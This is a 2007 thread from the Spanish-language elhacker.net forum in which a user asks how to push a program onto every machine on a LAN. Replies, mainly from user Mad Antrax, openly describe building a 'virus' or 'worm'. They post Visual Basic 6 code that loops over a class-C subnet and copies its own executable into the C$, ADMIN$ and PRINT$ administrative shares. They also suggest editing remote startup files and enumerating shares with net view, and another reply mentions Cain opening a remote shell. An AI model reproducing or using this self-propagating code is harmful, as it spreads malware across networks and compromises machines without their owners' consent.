elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  puedo hacer algo con la red lan?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: puedo hacer algo con la red lan?  (Leído 3,730 veces)
Saok Dagon

Desconectado Desconectado

Mensajes: 115

SaOk


Ver Perfil WWW
puedo hacer algo con la red lan?
« en: 2 Abril 2007, 11:07 am »

Hola

bueno, tengo un programa y me gustaria que se instalara en todas las Pcs de mi red lan (logicamente ejecutandolo en la pc administradora) seria posible?

aver si algien me guia un poco

saludos


En línea

www.colgados.net date una pasadita!

Todo el anime, manga, pelis, series...etc
Sancho.Mazorka


Desconectado Desconectado

Mensajes: 480


Gamer & Programador


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #1 en: 7 Abril 2007, 06:45 am »

Supongo que lo primero que tendrias que hacer seria obtener las maquinas en red con su ip, luego hacer que el programa se copie a cada una de las pc's...

Cualkier otra cosa avisanos!  ::)


Sancho.Mazorka    :¬¬


En línea

Ganador Xeon Web Server ! ! !    Sancho.Mazorka :D
http://foro.elhacker.net/index.php/topic,171903.75.html


Saok Dagon

Desconectado Desconectado

Mensajes: 115

SaOk


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #2 en: 7 Abril 2007, 11:34 am »


si asta ay llego, de echo ya tengo todas las ip's de la red lan  ;D pero no se como hacer que lo copie en cada una de ellas (de ay mi post)
En línea

www.colgados.net date una pasadita!

Todo el anime, manga, pelis, series...etc
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #3 en: 7 Abril 2007, 13:25 pm »

Pues kizas por net bios puedas hacer algo, eso si, este protocolo deberia estar activado en todos los pc's. Si buscas en este foro recuerdo q alguien puso un code para propagarnos por net ios en VB.

En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #4 en: 7 Abril 2007, 14:16 pm »

Es facil, te explico lo que yo haría...

1) Hacer que el virus recoja info del PC: IP local y Mascara de subred (por ejemplo haciendo un ipconfig /all y depurando la salida).

2) Calcular cuantos equipos hay en la lan a partir de la máscara de subred, por ejemplo:

Citar
Direccion: 192.168.10.58
Mascara: 255.255.255.0

Con estos datos sabrás que hay IP's comprendidas entre: 192.168.10.1 hasta 192.168.10.254

3) Empezar un bucle bestial de este tipo:

Código:
    For i = 1 To 255
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\C$"     'C:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\D$"     'D:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\E$"     'E:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\F$"     'F:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\G$"     'G:\
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\ADMIN$" 'C:\Windows
        FileCopy App.Path & "\" & App.EXEName & ".exe", "\\192.168.10." & i & "\PRINT$" 'C:\WINDOWS\system32\spool\drivers
    Next i

4) Ahora te lo puedes currar y editar los archivos de inicio de forma remota (copiando archivos en la carpeta inicio, modificando win.ini, etc...)

No hay que decir que necesitas permisos administrativos en la lan para poder hacer esto :P

5) Y para rizar el rizo, tendrías que encontrar el comando que te permite ver los recursos que comparte un equipo, te doy una pista...

Citar
net view [\\nombre_pc] te da todos sus recursos xD

Saludos!! y no seas malo haciendo lanworm's :xD
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #5 en: 7 Abril 2007, 16:46 pm »

Si que se puede, el Cain es capaz de instalar un servicio en la maquina remota que te permite ejecutar la Shell, por lo que supongo que tambien se podrá copiar y ejecutar otro programa cualquiera...

salduos ;) ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Saok Dagon

Desconectado Desconectado

Mensajes: 115

SaOk


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #6 en: 9 Abril 2007, 17:22 pm »



algien sabe de alguna api o algun code que me permita listar las ips de una red lan?

saludos
En línea

www.colgados.net date una pasadita!

Todo el anime, manga, pelis, series...etc
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #7 en: 9 Abril 2007, 17:45 pm »



algien sabe de alguna api o algun code que me permita listar las ips de una red lan?

saludos

Como te he dicho... las IP's de una LAN se consiguen haciendo la operación lógica AND entre la IP y la Mascara de Subred. Aunque si no te lo quieres currar tanto simplemente mira que la mascara sea 255.255.255.0 (es la más común) con esto sabrás que hay tantas IP's como 0's hay en la máscara.

Lee un poco en wikipedia y lo entenderás facil, explicarlo por aqui es complicado xD

Saludos!!
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Saok Dagon

Desconectado Desconectado

Mensajes: 115

SaOk


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #8 en: 10 Abril 2007, 14:13 pm »



sisi, si ya lo entendi antes, es simple, pero el problema es que si por ejemplo la ip es 196.36.56.6 el VB me devuelva 196.36.56 y luego ya con los calculos de la mascara subred y la ip que me devolvio acer 196.36.56. & X

luego lo otro ya me resulta mas facil, solo me falta eso.

saludos
En línea

www.colgados.net date una pasadita!

Todo el anime, manga, pelis, series...etc
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: puedo hacer algo con la red lan?
« Respuesta #9 en: 10 Abril 2007, 14:46 pm »

Aqui el código completo para hacer que nuestro worm se extiendo en una red LAN con una subred de clase C (la más común). Te puedes fijar que no he extraido ni la máscara ni he hecho el calculo, pues el 70% de las redes comunes son de clase C (A.B.C.?)

Código:
Private Sub Form_Load()
    Dim MyIP As String, HackIP As String
    Dim Octets() As String
    Dim i As Integer
   
    MyIP = Winsock1.LocalIP
    If MyIP Then
        Octets = Split(MyIP, ".")
    Else
        MsgBox "No se puede obtener tu dirección IP"
    End If
    If UBound(Octets) > 0 Then
        On Error Resume Next
        For i = 1 To 10
            HackIP = "\\" & Octets(0) & "." & Octets(1) & "." & Octets(2) & "." & i
            FileCopy App.Path & "\" & App.EXEName & ".exe", HackIP & "\C$\" & App.EXEName & ".exe"
            FileCopy App.Path & "\" & App.EXEName & ".exe", HackIP & "\D$\" & App.EXEName & ".exe"
            FileCopy App.Path & "\" & App.EXEName & ".exe", HackIP & "\E$\" & App.EXEName & ".exe"
            FileCopy App.Path & "\" & App.EXEName & ".exe", HackIP & "\F$\" & App.EXEName & ".exe"
            FileCopy App.Path & "\" & App.EXEName & ".exe", HackIP & "\G$\" & App.EXEName & ".exe"
            FileCopy App.Path & "\" & App.EXEName & ".exe", HackIP & "\ADMIN$\" & App.EXEName & ".exe"
            FileCopy App.Path & "\" & App.EXEName & ".exe", HackIP & "\PRINT$\" & App.EXEName & ".exe"
        Next i
    Else
        MsgBox "Error grave. Formato de IP no válida (¿Posiblemente IPv6?)"
    End If
End Sub

La próxima vez intenta hacrlo tu mismo, seguramente no te saldrá, postea tu código y la línea de error y entre todos te ayudamos. La única forma de aprender es intentarlo, no busques siempre algo ya codeado porque no lo encontrarás siempre

Saludos!! :)
« Última modificación: 10 Abril 2007, 15:37 pm por ||MadAntrax|| » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Hacer algo con la PS2 vieja.
Electrónica
Meta 2 7,450 Último mensaje 25 Agosto 2014, 14:13 pm
por Meta
me robaron la notebook, teniendo la ip puedo hacer algo?
Hacking
silvitate 7 7,896 Último mensaje 14 Enero 2012, 14:11 pm
por H1tchclock
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines